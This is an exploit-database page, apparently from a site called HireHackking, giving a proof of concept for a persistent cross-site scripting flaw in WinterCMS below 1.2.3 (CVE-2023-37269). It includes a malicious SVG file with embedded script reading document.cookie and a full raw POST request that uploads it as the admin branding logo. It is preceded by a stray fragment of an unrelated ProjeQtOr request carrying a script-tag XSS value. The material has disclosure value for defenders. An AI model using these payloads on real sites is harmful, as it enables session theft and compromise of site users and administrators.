application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3 Connection: close resultAck=<script>alert(4)</script>
HireHackking

WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2023-07-10 # Vendor Homepage: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter # Version: 1.2.2 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269 # Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3 # Video POC : https://youtu.be/Dqhq8rdrcqc Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality Description : WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script Payload:- // image.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> //Post Request POST /backend/system/settings/update/winter/backend/branding HTTP/1.1 Host: 172.17.0.2 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2 X-WINTER-REQUEST-HANDLER: formLogo::onUpload Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206 Content-Length: 608 Origin: http://172.17.0.2 Connection: close Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D -----------------------------186411693022341939203410401206 Content-Disposition: form-data; name="file_data"; filename="image.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------186411693022341939203410401206-- |-----------------------------------------EOF-----------------------------------------